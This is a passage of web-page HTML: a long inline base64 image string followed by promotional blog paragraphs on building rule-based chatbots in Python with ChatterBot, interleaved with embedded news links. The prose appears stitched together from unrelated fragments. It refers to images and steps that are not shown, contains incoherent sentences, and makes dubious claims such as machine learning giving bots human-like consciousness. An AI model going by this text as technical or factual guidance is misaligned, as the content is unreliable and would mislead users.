NKPg1\/aJccd6rJY6UNGj3SxzvCwf5to3R\/N1610ejaXRP1TxinIBjcbYDBEQQ2TP9l7fxN1DqmPQY3ZgMROVg9OQ2LmXQIXd+WHMfjyTj3WuXfHd1puoS6VaC5F\/axiMKCFOHxgdnHkCMHvWfH7TXLj9OSaNJf3Rjjk8Jr0W5+GDfVu+M\/4sbfPOOteVcArbvxpxpw1ysvLnUdD1HQ7grczoWkS5Me1cSsAzDcSBnv174zWXyr5jcsOHeVs\/Cuv2Zj1lDcQXFi1m8kl3I7ttAwpBJBVcHtt9K9HWdH0znOyjESYZ6W+kjcDLi29tjjj3Xh9P+JNfhY3TjOG3kO5\/rB2kQwOkbpHB59l69Dz84HuOD7njZJ7mDTba7Niwlg\/eyTYBCIqk5JDD\/MnoKyeDudvB\/Gd\/Lotol\/Y6nHF46WeoWxhkkT+JOpBHn3zjriteuD7Phq49nrUn4mh1RLaLiRpY5tORXltZPCjAZg3Tb\/hP\/a8jgjt3CHFt2\/M3QdD\/AFl0TjpL60m8DVIbNEvNOURsQrsn2R5EMc\/N1xkZ6eo6FpWDM3G10sLrJ4DRPMQTzNj2Xd03xd1BztO\/M5u14aSALlxINSHDtBAI8r0LXvaS5f8ADurXOj3Ut\/fSWbbLl7G1MkcDZwQzEjOP+bnqMd67Fdc2+DbbhNeOF1mFtEkUFZwpJcnpsC992em3Gcg+la4cvdcj4MsOJtF4h5hLwvfQ30z3VnNo0d1JdDAAKs3Vs9Rt9Oo71g6xw5LackbPW7CPU5tJk4hN9JHcwLE3gtGEDBVJCoWVgCcdT07gnsO+HtF85uI7gNzW7uzgQSYkAA1UEi1xY\/jLqvyX5htcdrjt7sIMCRuJIu5ANL0HmX7SOla3wRcfqBq+paTq8V3CV8eAI0kJJ3bD8ykdvPNe\/cM6jcXuiWdxdtvle1hd5GOMkoCT\/M1rHz05k8tOL+X9jp\/CAW6u4Z4pB4dmyCyjCkFWJUAEnAwO+PpWyXD0RfhSyit\/leTTosH0PhivM6vo8Wn0GItxHGS937uYEd4FL2vhzqWq1XU9RvzDKG42H002fVwJInsurazz84N0jVLvT4LXW9Rj0+Qx3t3p+myXFvbEfaDyKMdPPGaxuZXMNLbTeDuJeHuIFj0rU9ZthPcxsNktqQxcNnsMDqOhGK4bk1xpwRwvy7i0PifWtP0vVtFaWHVLe8kEUpmDtufaxBcN3BAOe2a4rXm4d1fhbl1caNwzJo+k3vFsE0NnOm3eplch9p7K5+bHo1cePQ6fDqg35boaYkxDqN8e0iJHlbzdX1mo0JcM7S5zd20SCw7miPtMGYPhd\/0Tnbwpq2vW3D1xZ6zpdxf5FjNqGnSW0F4w6kRM+MnHXBxnI9at4q5x8NcJavFoF5DqWo6nLH4osNKs3u5wn8TKn2fxOa4bnqsS6JwtcogUpxXpWxwOqkzgHBriOEtc0Dg\/m5xtZcXXdtp19qkltdafdXbCNJ7UJjYjtgfKQcj7\/Suvi0Wmy4v1DWHg+mbJBA5ji5P0XazdW12m1B0b8jR6mjeRQDg48E+WwLHK7THzv4O1CWS20kaldXMOntqTwx2UniqiuUMfh43eIGHVMZ7etdd4I5yX3GPCOrm+07U4NTgt9Qkjuo9NkitVWMt4YEhyviAYyue4PSuM4f1fQOIPaPvr7QzFLaPw4Fa6jAMdzIs+1pEI6MAMLuHQlPpVnK\/WNIi5Z8R8NvqlourWkusmWwaYCdRvkO4x\/axgjrjHWu4NDpsWE\/yiXfyzZsTun7UP+1546trtTqAHZgGj5rYFB23bB55sx\/ZZHBnPzS7DgzSH19dc1m7js45NRu7HTnnSBiCSZXQbVOMHHkCOlei3HMfhWDhgcaHWrddGaETLdknDA+W3Gd2em3Gc9MZrzjktx3y90Xlbpdvqet6bpM9lag3cF1OsUhySd4Vjlg\/cEA57dT26bFbG15d6PxReabcJw5Dxo+sNbmInw9NaRwjmPH2QzK+MdqmTpmny5ny0sAfH1mePevflMPXtbpdLjIyNySwni2ERbjMnm5g1S9c0bntwdq1\/a6ZJaa1pU+oNssZNT06S2iu28hG7DBJHbOK4O7553unc2bjha60bVZ9Jt7DdtttKlknNz4oHiDb3h2nG4DGfOsLnLxdwnxZwbacNcK65p+r61qt5bHTI7OVZXjcOp8X5SfDVQCSxxjtVt1rGkcM+0XHf67qFtYW13wqIIp7mURxySi4BKBmwCcAnbnNcWLRadrC92IyWuhpNy2LFA3PjsV2dR1XWHKzGNQ3a1+OXgV6pkGyKgd+CvaRqJ8UR7O\/qOtZk0pSMMACfrXCaPxBw9rlzd22manBcz6fOba6VGyY5QMlD6HrXNP4ZX5z0r5nI3Y4AiF9\/p8gy49zXAjyFNvK0qbmUD7qqW5kM2zHyk4xV8YjC4jI2jvVarbmT5R8w6964xF0ux4RPKYQNi96eOQvGWAAqJRGB+9GaZNu35Og9KVt4T+pUw3LvJhkAz6UXNyYWCgdz16U6eDvPhrgjv1ppPBJHiEZFXvwnZU\/FL\/AaKs3QfxiirXhcUFVR2skbhywIB7CnubdpOqEZ+tVxXEjSKpzg1ZcSsmCAeppDpWxBFJlhYQ+GxyT5ilt7YwuW3E04kfwixHWq7aaSRyGHSoN0FUxIRPbGZw2SMVY8JMPhq3WqrmaSNwqDpVjSuIQ4HUmnqgJUlJbW7xAlz1NY8+nSSuxyCp8jWTBI7g7vWklnlWVgvYVobt1crDmMcyHcLgf1D4WimmuLDhzTYLicMssqWiBpFb7QJx5561l2nDGl24sx+jLUfo8EWu2BQYARghP4Rj0rlbl3jTKCmgZnj3MDnFbOfKW25dduj07XelgC4mbh+2uLqC4vLSG4a1l8WB5E3Mj+TL\/CfqKx9e4O0LX3jm1XQtPvJYDlGntxIR59CQa5hJ5TPsI+WrLt3jXKDrQZcrXCHWq7S4cjC17QQfIlYFloOnWDST2thBDcTIsTyJEFZlXO1SQOoGTgeVJPoMF7G9rqVrDdW7n54pog6sPqD0rlEZ2iLkdQMiq4ZZWmAYdKnzMkkytfp8IAYG14XAJwJw3axLa6fw7p0EKSi4SNbZVVZR2cYH2up61ycGi2Ns081vZQx3Nzt8aZE2tIVGAWI6np2+lZlxLIkuFHSnMj+CHA+aq7NlcLdKxj0eDE70NA+wWBZaLbWd5LqCWcAuZlVJJgmHdV7At3IHlWLecL2F5qcOrTafbSXUHSO4aIGWMdeikjIHU9vWuYtZXkB3g0k00izbQDijcmQOkFadp8LmbS3vP3XG6tw9Y6xZmw1Gyt7uAkExTxCRWI7Eg0mn8K6Tp92upRaXaR3oj8Lx0hUOIx0Cbu+MAdPoK5qUsI9y98UlrJJKvzj1oM2QN2g0h0mF7w9zQSIuPCxG01i4bLd89K4vWuCeHNbn+L1Dh\/Tbu42hDLPaq7EDsNxGa53xpg4GOmae4JRRtHc9arMuTG4OaYPspk0uHM0tyNke64TSeF9K0W2a30rTLayD9WFvAsYb+Q61ixcC6EmqNrDaJp5uu\/j\/DL4pOO+7FdmQs0bMR1HaqYJZGlKsDitjU5wXEOMnm+VwnQaZzWt2CBwIFLhU4S0y3t3tLDS7S2tpSTJBFAqo2e5Ixgk4H8qjTOCOH9G8R9F0OwsppR87wWyxs30JAzXO3UkkZAQHrT7m8Hfjqafqc22N3P\/rWhoNM1wcGCRxQpdZueBuH9TnW71nQrG9lQfK01ujN\/Mis+40GG4iNubdTAy7GiZQV24xjHbGK5WFndjkdqWaWRZSq5xQ6nK4gF3HCjdDpmSQwSea5+vldfXl\/wlHZS2EHDOmLDMyyOgtECsw7EgD765my08WqKvhqgACqqDAUDtWZIXWIsg67c1FvI0gw464rD82XI31GfquTHotPhcDjYG\/Rdf1Hgbh7VNSXUb\/QNOuplIIlmtkdsfeRXIX+h2l+sC3FlBL8JIJYA8e7w2HYr\/CR6iswyzeMFA6Vdcu6R7k71DmymATxwo3R4Gh0N5591x0uh2t3bpb6jaQXKxyLKglTeEdTkMM9mB6g1harwfouuFU1zSbO\/RMlBcQLIF\/mOnaucgkkeIsw6gUiSSNMFI6HpRuTI0yDCuTSYMoh7QfsuKHDGlRTxXVjplrBNDEIEkjhClYwchAQPs58qI+FdES4mvk0Wz+LuI2jluPh1EjqehBOMkH61y9w7RlQg6U6sxg8THzVfnZI5V\/SYCf2D8LrB5f8ADEzW5vuG9LmFooSAPaI3hqD0C5HQfSuUuNHSVDGsaeHt2bCuV29sY7YrPt5Xkcq+elLcSyRyBUHSqc2Vx9TpWW6PTsadrBfNLh9P4I4a0mQ3Ol6Bp9ncsMGW3tlRjnv1Aq2fhfStR2\/pnSrS+ETZjE8CybPqMjp2rmiWEO\/HXFVWsssjYcdKz87KZJctDR6dsMDBHiBH4WDa6DZWE802n2lvbtcSeJM0cYQyN\/E2O5+tcjPCZECqeq0jTzCQqD03Y7fWrZpGVMr386w4vJBcbXOxjMYIaIUQQtHkOQd3pVa2pjlDgnGashld1YsOw6VXFPI8xQg4rI3SVujCtuIfGHftUxQ7I\/DJNLdSvGBtFNE7PFlh1pe1BG5VQ2rLIHJPTNTPbvIxZWAHbrSx3EhmKkdKa4lkVsL2xV9UqGAJVXwcn8Yoo8eait+rysyxZCTQFgEwT5VMrxr9rB86SO02OH3dvpRPbeMR82CO\/wB1cVTyt+qOFarLs3f4TURPGxOzGajwlWPwgc0lvbeCxY\/66DbBVMyE7vEpAcDNOzxqm9iNtU3Ft4zhgf8AOnMIMYi3YodsC0uUQyROMpUNNbhyGxnzohgEWeuT2pHs9zlg2M1fTPKg3RwrXZQmXHf1oidXUkdAKiaIypjzHaiCERJt8z361mtvKt7kB4S2ABmpldFHzdaqW12zeJ1\/nTTwCYYV8Gr6Z5Ul0cKwMrIHXGPOq45oZGIQ9e1MkQSIxqcDGKSG1Ecm\/dnz\/GpV2rLqpNJJEjASd6YMhQv02+VJNbCWQPnHrTeEPC8InI86tQl2iJ0cfKADQzxbwGAzSQQeD9qoltPEl8Ty++qA2eVDMcK2WSONdzn5fIURPGyZjxUSxLJHsxnAqIIfCXB7nvWahU7pUeNAXAyM59POnkaNBmQ5GelVfBjeGLdM+lWTQCVQMgYqnbPKepNG8bruU9KVXiLELgmiOHYhjLZz2quG18KQufP60gXal1StkaJcb8daktGE3ZAWqrm38fBHr61YIgIvDJxUqBatylhkic\/u+9DzQK5DkZ86WG2MTEls+lD2niMW3YzVqVPVHCsLJs3N0FRDLFID4fcVMkO+PZnrjofrSwQCEdWyTUqFRM8KfEi3gYGaaR0UfP2qj4TMvieX31bPEJk2jy+taO2RaXaZGjKkrgDzqtJoXkKr3HSphg8GMqT3GKVLUJJv3ZHep6ZNpcBPJJEm0SdTTIyMpcfZFVz23ikMGAIpli2xeGTkVPTHKSVEbRtIdoAOKZ3hU4fGargt\/DYs33Dr5VFxaeKwYeX1q1u5Ul0K8sgXce1JG8bj5AAakwgx7PMCkggERye\/31KjlWXSpaeANtbGc4\/GmlkREy56VU9pufdu6E5qyaASJtzgjtVqlPVBTRyRv\/yePrSh4i5VQN1RFCIgV3ZzSR2nhymT\/fT0yrdK6RkAG\/FSjKV+XsKruITOBtNTHGI4\/DP+ukN2pe5EckbscAA1EksKHa560kdt4cm4\/wD5aaa28Rt27H4VfTPKnqjhL49t6j+VFL8Ef4x\/KitenypLkkMk5mCt5dx6VZdmRcbd34U8d1G77AD9D60086RAbgT91S54So5UREmHoDnH+dVWrSF2V93T1q8TBo94BApYrhHYqFII8\/WpcGloxIVN20gcBN34VfKSIMjvj8aWW5WNgrLn6+lWGRUTeR0oZgUoCCTaosy5zu3fjSSyXAnYKememayIZ0lBK5pXuo1coc\/f6VbnhSiIlTclxGCM\/XFLaszRncTkeverJZVjUM2fwqIpxKuQCAPWsidvCtbuVQhm8bqHx+NNd7l2lQR6kU4uE8TaM5+6pnnEYGV3Z8qpmRSlAcqYi4gyQc\/WqLZ52mIftWSsimPeO1JFcxyOVUHpQTdK1Squ2dWAUN+FWsWNuSuc48qJrlImAYGnMqlN\/lQzVJV2qLVndmB3EfWolMvi\/KHx9M1bDOsmVAAI9Kh54w+0k5+6rcmlKiJRcMywZUHP0qLVnaMsc\/fVkkqxpvOcUQzLImQMVm9vCtSsYST\/ABGD9nNW3ZdUBXP4VPxUe4Lg9TinlnSNctmrc8JXlJbszRZYHIqq3aQzsrbvuNZEcqSJlc4quO5R5Ciqfvpd0lUlu2dWXZuGT5VYC5gJIOcUTzrHgMpP1p96iPdkgd6XApKlY9o7uxB3dP8AKonecTME+z5VbBcJKxwMY\/zqXuo0cqc5FL3cKCCOUSFxBu65AyaS0ZnViwJ9CaueVVj346YpYJ0lGVyMeVS44VBBKx2eUTgHdg1dcsyx5GRQbhFkC7c5\/wAqaWZY13Mu76VTMikqxKW3LeDl8579apheQzkHdjNZEUyum9QcelKl1G8mwZzQTJpJEC0l40ygeHVqM5gyftY8qJriOLG4GmWVWj3+VQzApKlY9s7tKQS2PrU3LSh\/lDY+lPFcLI5UKQRRJOiNhgSfuq3KlFvKmQuLckA7sfjSWbO2S27H1q1pFRC5yR6UsEyyj5VwR5UvaaV7hUSySfEYG7GcVdclhFkZoa6jEnhkHNPLMsabjnFLkUpUG0lozNH8wOfrVKtL8QAd3ft1rJhnSVcqDiqxcoZdgX8aCbpWqtF0XUDbn8KaMsIssDketTJKsQ+bJzUpICm5cnFL2qiJlY1s0rSfNuwPWmvHmV1CHAJ\/nVkVykj7QCD9aJbhY2CkZP8AqpYPClQbVWbn+H\/KirPiof4j\/Kit34XDI8po7WJGDAdRRNCJT9rH4VRFFKkiszHAPWrLpJWwVboOvT1rEXyuaa4VyoVTwz2HnSQxIjEhgalVkMG0tliKqto5o3beelQCjapsik88KyEEvtNWPGrx7D2x3qi5ileQGM4ANO8cpgwGww60ihadzSmCFIei1DWsTOWYdTS2qSr\/AMoc5quSG4MjHcfwqxfKgNcLJmQOoBbGPOiKMRptUhvrS3Cu8Y2Hv3qLZZBGd5+gqR6eVf6uELCgk3BwT6YppoxJjcwXH0qhIZxNuJ6VZdpI64Q9apmeVJrhWogEezuPOq4raOJy6+dTGsngbXPzEYzVMEc6yEliRnB+6pzNqzxStmt0mYFvKrDGojKdh61RcRytKCjHGOlOY5Ph9gPzCkcWnc0phhjjJZOpNRJAjSbi4H0xSWiSqOp6VwnHGtz8L8M6vxNHbfEfoyymuhFnAYohbBP4VvHjdlyDG02aXDnzs0+E5cnDQSfoF2CWNJE2N29amGNIxhTkGtNLL2uucmryGDTeF9GuzkgJb2FxK38lkJrkb32lPaB0Kw\/SOs8C6VYWikZkurCeHOT0A3ygk\/cD\/lX1R+COrNIY7aCe29s\/iV8OP8SeiEF437R32GPyttzaRbgwGDnNPNCsqgNjFebpzVt7XgDhzji\/0u7kn4hFrHbWNsQzSXEy5WNSxA8j1JHQVlwc0be5\/RcGp8P6vpFzqOpPp3g3sITY6wNNu3Z2shVcBlJGTjyNfPO0GoabbwSPuOV9U3rOjcB6uQHfY8LvscaxKEUdPOkihRJCwcH8Kxhe2tvAZLm7ijVyAGeQKMnsOtLHOsUpL3EY2dXy46A9ia6u08r0DlZMAhZk8SyfaYL+FPsVk2EAjFdK4m5o8JaFp2s6ldamHTQZ47S8jiQtIJ5FRo41X\/EzCRAMdMnrXG6Pzk0\/ULibR9W4b1rQtQSyl1GCHUIFU3EMfV9hViCR0yDg9RXaZ0\/VZGb2sMBdHJ1nQ4coxPyCT\/7njt+V6JBAkTHbQ9tG7l2HU10K05rabLa8MXUOm38jcWQyy2UQVdwKQGba2WwCQpA+uK4rhXnJd8ZcWT8Lx8v9fsJ7J1S\/kuDDssyyFk8Ta5PzAdMA961\/DdUQ7Jtpok8cTH\/Ij6rjPXNCHNx7rcQAIJkkT\/xf0XqskamPaTgCkhhjhGYxnNfOH2qfeMc9OSnPvi3lVwjw7wTcaPoMlrFbzahp91LcP4lpDMxdkuUX7UpAwg6AV0yT3kXtq2eoPpEnKvgeK8TRjxEYJNFvQ\/6MEJmN1\/78Mx+GGbI64B8xiuhEjlex3lfVDwU8TdvGfTFPMiupUnH1rxf2TObXFfPfkZw3zS4ttdOtdU1c3XxEWnRPHbr4dzJGu1Xd2HyoM5Y9c\/dXstyjyR7UPWrFi1ieaTxRqke0EMKRLeJZdyHr3ogjlWIq56kYFVpHMswJPTzoBZtJ4pXT26TDDUwjVU2L0GKpuY5mZdjdPpTxq4gKkneM07C1ZvhRDCqMWVsn0xRLCrsCXCn7qS2SZJDvPQ9ai4imaTch6Vf6uVJrhXsgMXh56Y70sESxkkMDmhlkMQVT1Heq7RJFZt56CoP2m1e4TtaxtJ4mOtPLGsibG7VjvFMX3KxwTkVZcJI0YCnr54qxxahNGlZDCkK7VHTzqtYEEm4SZIOcYqYI5EUhznd2qmKKdZyzHpUA5tJ4pZM0ayKNzBaI1CJtByPWq7qOWRRsNNEsgi2k\/NQj08qg3woihWOTcHzj6U0tukp3MOtU26TCTLHoT1qbiOV3yjHAq9xagNcKfg4v4aKo8K4\/jaiuSPdYvwr47newQp3+lE1x4RA2k5OM06xwqQwIzTSxxnBfpg5rj9M8LdwgSYjMhFVwXPjOVK4q3Cldv+E1EccUbEp3rIiCtEGQkmufBYLjOaZpsReJg9RRIkUhBemKx7dp+yKVApADJVdvN4idR2pZLvZIU2dvPFWxLGM7OoJqGiiLEk9a1LZWYdCieYQrgdqmKUSJnHbrUyLHImX7GpiEYT5OoqS3atQdypW8LSeHtpricQLuxmpEUQfcO9NKkbgCTHXtVO2Qsw6FCSh4zJjsKSK43ybAvQ1aqoE2jselLHHEGJQjPY1kbbVukstx4UgXbTGYCMS470SRxsw3kZpgsZTb\/hFWW0gBtVW1wJgcDAFdW5qW93qvL3iXSNPt3mubrS7mKKNB1d2jICj6k9K7ZDHEgyhFQ8cZfdtya5MOUYMoytFgg\/hdfVYP1OndgcYDgR+RC0A4P5m8ZcubX9TX0LUpbkTsVsbme4gMZkUbFESYY\/N82M4IboMnNcTxHpPNri2\/a91fg\/iOaVifDRdInSOLPcKoTA+p7nzNbvW3KLhaDmJqPM28ia71a98MQGYApabY1TKD1IXv36nFd3hiRU7A4r9Fd8daXT5\/1Ol0rTkcBuJJ\/ceY9p\/K\/I8X+GWt1enOk1mrIxNJDWgD9vYni\/zC8btdA1qLkxwpw1qHAkWux29rapqWmyyiK4jVY\/tQkkL4itt7kdMjINcJZcueKdcXRrPizQLq44ei4ke6h07Vbpbqa1sRZuoWVsncDN1C5bGQMkV7\/wCHCHBBGc9OtPIkbLh+gBz1r4r+LZGl20RuJPep8XA+vK\/Qz8N4XNYHuJDWhvawPNX9DS12flrrVroujQ63wE3EVhYRavZw6Z4sTfCtLdu1tIA7BdohwoIOVGMCq9T4B5iQ6XPw8mhSapPrugaVpk14lwgjtprd2Mhl3HcRhsgqDnBrYxFjAwvY0sUcIc7O9ch6zldJc0ee\/mfPn\/6uIfC+BhlmRwoDtxEHt3H47LXriTlDxBJecaPofD9tDez6zp2u6Xcs6LFdCFIzJAxHzKTIsjEEYJYHPeueOkcecx+KbTW9a4Qfhmx0bTLy3jE9ykslxcXCbOmzsijJycE5r2iVIpPt+VMFQLtx8tQdZyhoO0bhQNyJAB7xYHdU\/C+ncS3edhstEQYJcO00T25XgPAPC\/MG61ngLS9d4QGl2nAsU6TXrXSOt2TA0K+Go6gHdu647V3Xgfh7W9E5lcwdbv7Ix2WsXNi9pIWB8VY7cKxGOvRunWvR4ljydpBzQ8cLMSxAJ+tcWo6m\/OXDaAHCKn\/Vu7nyuxo+g49LtdvJc126TH+naBQFAL4xe2Fp\/AV\/7dXHcvMXiO507RYNT0WS7ihsWnku7f4Oz8eNGVh4TeFuwxDdSOlZ\/FPtVcouY63vFF9wvrfDXEFpwxxPwrZQy3i6iLuz1Gzl+Fj8RIohEkE7MioQwVJchjggfUriv2cuQnG+u3XFHGPJ7hDWtVvtnxF9faTDNPMVUKu52Uk4VVH3AVxS+yN7LZGU9n\/gH8NCt\/8A+teZI5Xvrzz3cU5j9kPgiNgMs+o\/7bNWzc8vhLuxmuH4T4L4Q4E0a24b4N4e0\/Q9JtNxgsbCBYYIizFm2ouAMsSTj1rm5AjJ8\/aqYkLMG0kVwJYy+3GBmkW53yhcYq2NIwuF7GlWOISEqRkUBbJUulE9x4TKAMg0yyjwvFx3qZI42xvOMdqlVTaUHVRSWwtQVVBciYkYxg4onuREwXFPEkSsQhGe5oljicgv3q+ncpe1SZAsfifSq7e4E3TGOuO1WsE2EH7IpYkiVSY6nphW5Cre72PsCZwcVZNN4aBgvfv0oMcTMGyM5zTSKjKQx6U9NKQYSxTCRSdv2RSJdb5dm2rY1jUYTs1KEhWTI7mgi0INJbifwQPlzmnSbfH4m2iVEk+3TKqqmF7VK2pB3KhLkGQripmuPCbaFz0zTRpBvLL3NTIkTklyM9q1LZUsBY\/xp\/hoq3wYfUfzorct8LG9\/lJFaSpIrHGB9aa4geQ\/Kc+WP99aBr76j2ZgwJ4A5nEeg03T8\/7bUv76r2ZjgR8vuaC9eu7TdP7f+drEmVvaFv8ArEVh2Z61XbwyI5LPuH3VoN\/fU+zCFx\/Z9zRY\/TTdP\/O0qe+p9mUdJOXvNHH003T\/AM7Uk8LULfu4hkdwUfaPPpTtEzQ+HnJrQFvfU+zKeicveaOPrpun\/nab++p9mHbj+z7miD9dN0\/87VkqQt+7a3aLJJ\/CqpLSVpGYMDn1OK0HT31PsyrnxOX3NBsnpjTdP\/O1De+o9mYsdvAHM4DyB03T\/wA7STMptAC3\/uY3dMIcEdcetRbxSxxlXPetA399V7Mu0hOX3NAHyzpun\/nahPfUezIBmTl\/zQJ7dNN0\/wDO1mTEJFyt+Ut5Vm3eJkfdT3UJkww6keVaBj31PszBsnl7zRx\/3Zp\/52pb31Psx4\/d8veaOfrpun\/na1JmUhb\/AEcbLCYy24479qqgtZI5NxYAfQ5rQf8AvqvZjIx\/Z5zRH1\/Run\/naVffU+zIrfNy\/wCZ7DH+HTdP\/O0khIW\/dxbSSSBlORj1xin8JxB4WcH1rQFvfVezISNvL7mev\/a03T\/ztN\/fU+zGBg8veaJ+o03T8f7bUkpELfm2haMZcY\/GlmhmaUMj4H3VoKnvqPZl7ScvuZ\/4abp\/52pPvqfZm3ZXl7zQ2j\/o3T\/ztWTMqFghb+zQvIgUHNTbwvECC3fy9K0Cb31PsxFfl5f80Fb\/AJ2m6f8AnaiP31XsyBQH5e80WPmRpun\/AJ2pJiFYuVvx8JKZA2QOuc5q25heVQAc1oCPfUezOH3fqBzOKen6N0\/P+20z++q9mPHycveaAP107T\/ztCSm1b+QRNFGUPf1quGCVJDl8j1xWg6++q9mPad3L3mgT5Y03T\/ztQvvqfZlyd\/L3mjt+mmaf+dqglIW\/dzDI5Uo+PXpT+G3g7Acn+VaAv76n2ZT0i5fc0PrnTdP\/O0w99T7Me3B5fc0A3\/dun\/nam48Jt7rfm2geInPT\/fSzWsjyM64IP1xWgsfvqfZmBJk5f8AM8+mNN0\/87Uv76j2ZScry\/5nj6HTdP8AztNxmUhb\/wAkbGHYD1x\/OktoGiUk9z5ZrQRvfU+zJt+Xl7zQDY6H9G6fjP8A52iP31PsxgZk4A5oE+g03T\/ztASkLfg28njBhJ09MVbOjumFbtWgP99R7Mwbd\/Z7zR2+n6N0\/wDO1Le+p9mPGE5e80cn\/o3T\/wA7VkoGiFv5DG6oQW3Ej7qrhtZEl3kgDv3zWg6e+p9mQDD8veaOfX9G6fj\/AG2oHvqfZkVuvL\/meR9NN0\/87SSkLfy4geRgynOPKnSNlh2ZwfWtAH99V7Mhxs5f80F9c6bp\/wCdqR76r2ZAuG5e80SfUabp+P8AbalptErfm3tykhdic9vvouIJXfckmPpitBV99V7Mmf3nL3mjjPTGm6f+dob31Psyk5Tl7zRx9dM0\/wDO1ZMypt7Lf6SN2h2K3XFLawyR5Lt1PTFaCH31XsxYyOXvNHd9dO0\/87UJ76r2ZcfPy85ok\/TTdP8AztSTCbe635e2kaTcOgznOatnhaSPaDWgB99R7M+7\/wCAOZ+M9v0bp\/b\/AM7TSe+q9mPb8nL7mgD6nTdP\/O03FNoW\/ltC8KFTVYgkEud\/QHOcVoOnvqfZlAJbl\/zQb7tN0\/p\/ptH99V7Mm7ry85o7f+7dP\/O1QSrC37uonkA2Nj8KaNHWLYWyfXFaBN76n2ZCMR8veaP46bp\/52ge+p9mPbhuXvNHI\/6N0\/8AO1JMQgElb8QwSrJl26Dt9aa4tpJH3LjGPWtA099V7MwJL8veaGD2xpun\/nal\/fU+zKeq8v8AmeB9dN0\/87VkqbRC32+Bm9R\/+qitBv76j2aP\/oHmb\/8Atun\/AJ2iruKny2r4v0UUVxrlRRRRREUUUURFFFFERk+tFFFERRRRREUUUURFFFFEQST3NFFFERRRRREUZPrRRREZJooooiMn1oyfWiiiIyfWiiiiIyfWiiiiIooooiKKKKIiiiiiIooooiKMk96KKIjJ9aKKKIiiiiiIooooiMk9zRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRREUUUURFFFFERRRRRF\/\/2Q==\" width=\"305px\" alt=\"rule based chatbot python\"\/><\/p>\n<p><p>While its AI might still need work, you&#8217;re not already benefiting from preprocessed data extracted from WhatsApp exports to gain its intelligence. ChatterBot utilizes the BestMatch logic adapter by default to select an appropriate response. Python\u2019s Tkinter is a library in Python which is used to create a GUI-based application. Now, separate the features and target column from the training data as specified in the above image. A chat session or User Interface is a <a href=\"https:\/\/www.metadialog.com\/blog\/build-ai-chatbot-with-python\/\">frontend application used<\/a> to interact between the chatbot and end-user. Application DB is used to process the actions performed by the chatbot.<\/p>\n<\/p>\n<p><p>Finally, we need to create helper functions that will remove the punctuation from the user input text and will also lemmatize the text. For instance, lemmatization the word &#8220;ate&#8221; returns eat, the word &#8220;throwing&#8221; will become throw and the word &#8220;worse&#8221; will be reduced to &#8220;bad&#8221;. On the other hand, general purpose chatbots can have open-ended discussions with the users. Now start developing the flask framework based on the above chatterbot in the above steps. As you can see, our chatbot is working like butter, and you guys can play more by changing questions inside the chatbot.get_response() function.<\/p>\n<\/p>\n<p><p>An AI bot is powered with machine learning that gives it a human-like consciousness \u2013 to some extent. Compared to a Python rule-based chatbot, it can understand the users&#8217; mood and context and generate responses accordingly. In this article, I will demonstrate to you on how to build basic chatbot in Python using Rule Based Approach with the use of regular expression. Although this is a tedious approach, this is a good starting point to understand. In the Rule-Based approach generally, a set of ground rules are set and the chatbot can only operate on those rules in a constrained manner.<\/p>\n<\/p>\n<p><p>It\u2019s also important to perform data preprocessing on any text data you\u2019ll be using to design the ML model. A rule-based bot is ideal for scenarios where standardised responses or responses generated from computer systems are required. A rule-based chatbot is a chatbot that is guided in a sequence; they are straightforward; <a href=\"https:\/\/www.metadialog.com\/blog\/build-ai-chatbot-with-python\/\">compared to<\/a> Artificial Intelligence-based chatbots, this rule-based chatbot has specific rules.<\/p>\n<\/p>\n<div style='border: black dashed 1px;padding: 14px;'>\n<h3>No Cloud Required: Chatbot Runs Locally on iPhones, Old PCs &#8211; Tom&#8217;s Hardware<\/h3>\n<p>No Cloud Required: Chatbot Runs Locally on iPhones, Old PCs.<\/p>\n<p>Posted: Mon, 01 May 2023 07:00:00 GMT [<a href='https:\/\/news.google.com\/rss\/articles\/CBMiPGh0dHBzOi8vd3d3LnRvbXNoYXJkd2FyZS5jb20vbmV3cy9tbGMtYWktbGlnaHR3ZWlnaHQtY2hhdGJvdNIBAA?oc=5' rel=\"nofollow\">source<\/a>]<\/p>\n<\/div>\n<p><p>However, Python provides all the capabilities to manage such projects. The success depends mainly on the talent and skills of the development team. Currently,  a talent shortage is the main thing hampering the adoption of AI-based chatbots worldwide. The demand for this technology surpasses the available intellectual supply.<\/p>\n<\/p>\n<p><h2>Chat Application via Python: A Complete Guidebook<\/h2>\n<\/p>\n<p><p>In fact, the first-ever chatbot was made in 1966 by Joseph Weizenbaum at MIT. Now, they\u2019re everywhere, helping companies provide 24\/7 customer service, developers debug code, and students learn. The design of ChatterBot is such that it allows the bot to be trained in multiple languages.<\/p>\n<\/p>\n<div style='border: grey dotted 1px;padding: 10px;'>\n<h3>The Future of Regulatory Intelligence With Conversational AI &#8211; Applied Clinical Trials Online<\/h3>\n<p>The Future of Regulatory Intelligence With Conversational AI.<\/p>\n<p>Posted: Tue, 24 May 2022 07:00:00 GMT [<a href='https:\/\/news.google.com\/rss\/articles\/CBMibWh0dHBzOi8vd3d3LmFwcGxpZWRjbGluaWNhbHRyaWFsc29ubGluZS5jb20vdmlldy90aGUtZnV0dXJlLW9mLXJlZ3VsYXRvcnktaW50ZWxsaWdlbmNlLXdpdGgtY29udmVyc2F0aW9uYWwtYWnSAQA?oc=5' rel=\"nofollow\">source<\/a>]<\/p>\n<\/div>\n<p><p>Installing chatterbot in python is very easy; it can be done using pip commend by following steps. First, let make a very basic chatbot using basic python skills like input\/output and basic condition statements, which will take basic information from the user and print it accordingly. For this chatbot example, I want to create a chatbot that answers everything about the domestic cat. In this article, we will develop the Rule-Based chatbot by utilizing Cosine-Similarity distance as the basis.<\/p>\n<\/p>\n<p><p>A chatbot enables businesses to put a layer of automation or self-service in front of customers in a friendly and familiar way. A chatbot is a computer program that is designed to simulate a human conversation. In 2019, chatbots were able to handle nearly 69% of chats from start to finish &#8211; a huge jump from the year 2017 when they could process just 20% of requests. Even though Wit.ai is an open-source project, important key components such as the NLU engine run only in the cloud.<\/p>\n<\/p>\n<p><a href=\"https:\/\/www.metadialog.com\/\"><\/p>\n<figure><img 